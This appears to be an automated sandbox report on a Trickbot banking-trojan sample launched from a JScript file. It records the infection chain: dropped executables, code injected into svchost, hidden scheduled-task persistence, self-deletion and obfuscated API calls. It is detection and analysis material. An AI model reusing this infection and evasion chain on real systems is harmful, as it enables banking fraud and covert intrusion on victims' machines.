Source: unknown | Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49206

E-Banking Fraud:

Yara detected Trickbot
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY
Yara detected Trickbot
Source: Yara match | File source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

System Summary:

Wscript called in batch mode (suppress errors)
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Abnormally high CPU usage
Source: C:\Windows\System32\wscript.exe | Process stats: CPU usage > 98%
Allocates memory within the range reserved for system DLLs (kernel32.dll, advapi32.dll, etc.)
Source: C:\Users\user\AppData\Local\Temp\431846743.exe | Memory allocated: 76ED0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\431846743.exe | Memory allocated: 76FF0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Memory allocated: 76ED0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Memory allocated: 76FF0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Memory allocated: 76ED0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Memory allocated: 76FF0000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0006A2B0 NtQueryInformationProcess
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0007B420 LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,AdjustTokenPrivileges
Detected potential crypto function
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0006B160
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00061180
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00065980
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00066B60
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0007B420
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00071820
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00068440
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0006A480
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000754B0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00062CCC
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00068CD0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000788E0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000768F0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0006C960
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0006BD80
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0007D190
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000649E0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00077650
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00066660
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00070660
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00071270
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000782C0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000756E0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00070EF0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0007C2F0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0007AB10
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00061B50
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0006E760
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00064370
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00072FD0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000737D0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000727E0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0007B420
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000768F0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0006B160
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0006C960
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0006BD80
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00061180
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00065980
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00070660
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000782C0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0007C2F0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0007AB10
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00061B50
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00066B60
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00071820
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00068440
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0006A480
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000754B0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00062CCC
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00068CD0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000788E0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0007D190
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000649E0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00077650
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00066660
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00071270
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000756E0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00070EF0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0006E760
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00064370
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000737D0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00072FD0
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000727E0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0006B160
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00061180
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00065980
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0007C2F0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0007B420
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00071820
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00068440
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0006A480
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000754B0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00062CCC
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00068CD0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000788E0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000768F0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0006C960
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0006BD80
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0007D190
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000649E0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00077650
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00066660
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00070660
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00071270
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000782C0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000756E0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00070EF0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0007AB10
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00061B50
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00066B60
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0006E760
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00064370
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00072FD0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000737D0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000727E0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018007C998
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800949E0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180096D20
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800796DC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800B1758
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800A7D24
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800BA050
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018000E070
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800AA078
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C40FC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180030108
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018001015C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800B6170
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018008E1F4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180046218
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800AA254
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018001E278
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800AC324
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018003434C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C8368
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180058374
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018005A418
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018003C420
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018002A560
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800A4624
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800966D0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018005C738
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018008C76C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018000C874
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800928E8
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018006A930
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018006692C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180040948
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800B4960
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180030980
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180052990
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800449D4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018004EA90
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180018AE0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018005CAE4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180088AE4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800CEB2C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800A8CA0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C2CB8
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C8D04
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180026D18
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180048ECC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180090F28
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018007CF40
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018005AF68
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C8F7C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018004CFAC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180050FF8
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018000100C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018008B09C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018006B0A4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800830B4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800AB104
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180091180
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018003D214
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C3250
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018007F2B4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800832C4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800A32FC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180031367
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180089370
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800AF3B8
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018002F3E0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018008D428
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018007549C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800434B0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018005F504
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800A3504
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180095514
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800235C4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018009B5EC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018004D628
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800776A8
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800896B0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180057710
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180093798
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800597C4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800817D1
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018000F800
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018006984C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180049878
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800838B8
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C38FC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800918F4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180087920
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180051948
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800BF960
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800219C8
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800AF9D4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018006BA60
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800BDAEC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180029B24
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800ABB78
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180037B94
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800D3BFC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180087C00
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180095BF4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018005BC74
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800A3C88
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018004FCC4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800ADD00
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800CDCFC
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018005FD20
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180045D38
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018003BE18
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180025E28
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180067E78
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018000BEA4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180065F9C
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180087F98
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800BFFBC
Source: C:\Windows\System32\svchost.exe | Code function: 39_2_0000000180001B4C
Source: C:\Windows\System32\svchost.exe | Code function: 39_2_0000000180002720
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018002AC08 appears 54 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000000180001804 appears 33 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000000180028A10 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018000F3E0 appears 41 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018000F534 appears 153 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 000000018000FFC4 appears 124 times
PE file contains strange resourcesShow sources
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\svchost.exeSection loaded: nss3.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winJSE@20/7@4/8
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007B420 LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,AdjustTokenPrivileges,18_2_0007B420
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00072350 AdjustTokenPrivileges,RevertToSelf,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_00072350
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800B1870 GetCurrentProcess,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,36_2_00000001800B1870
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006BA80 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,18_2_0006BA80
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00077C20 CoCreateInstance,14_2_00077C20
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\AppData\Local\Temp\431846743.exeCode function: 13_2_004013F6 _EH_prolog,strlen,FindResourceA,strlen,atoi,atoi,VirtualAllocExNuma,atoi,VirtualAllocExNuma,#1134,#2621,#2514,#641,13_2_004013F6
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\WinNetCoreJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\789C000000010
Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\789C000000010
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\431846743.tumJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
SQL strings found in memory and binary dataShow sources
Source: svchost.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Sample requires command line parameters (based on API chain)
Source: C:\Users\user\AppData\Local\Temp\431846743.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_13-898)
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_17-920)
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\Monet.jse' 578
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\431846743.exe 'C:\Users\user\AppData\Local\Temp\431846743.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {09EF86CB-0344-4609-A443-6612E4A0A019} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown | Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\431846743.exe 'C:\Users\user\AppData\Local\Temp\431846743.exe'
Source: C:\Users\user\AppData\Local\Temp\431846743.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32
Writes ini files
Source: C:\Windows\System32\svchost.exe | File written: C:\Users\user\AppData\Roaming\WinNetCore\settings.ini

Data Obfuscation:

Potentially obfuscated JavaScript found
Source: Monet.jse | Initial file: high amount of function use (1673)
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800949E0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,36_2_00000001800949E0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800C5F85 push rbx; iretd 36_2_00000001800C5F86

Persistence and Installation Behavior:

Yara detected PersistenceViaHiddenTask
Source: Yara match | File source: 00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3172, type: MEMORY
Source: Yara match | File source: Process Memory Space: taskeng.exe PID: 3388, type: MEMORY
Drops PE files
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\431846743.exe

Boot Survival:

Yara detected PersistenceViaHiddenTask
Source: Yara match | File source: 00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3172, type: MEMORY
Source: Yara match | File source: Process Memory Space: taskeng.exe PID: 3388, type: MEMORY

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\monet.jse
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49203 -> 8082
Source: unknown | Network traffic detected: HTTP traffic on port 8082 -> 49203
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\431846743.exe | Code function: 13_2_00401A57 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,13_2_00401A57
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Code function: 17_2_00401A57 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,17_2_00401A57
Extensive use of GetProcAddress (often used to hide API calls)
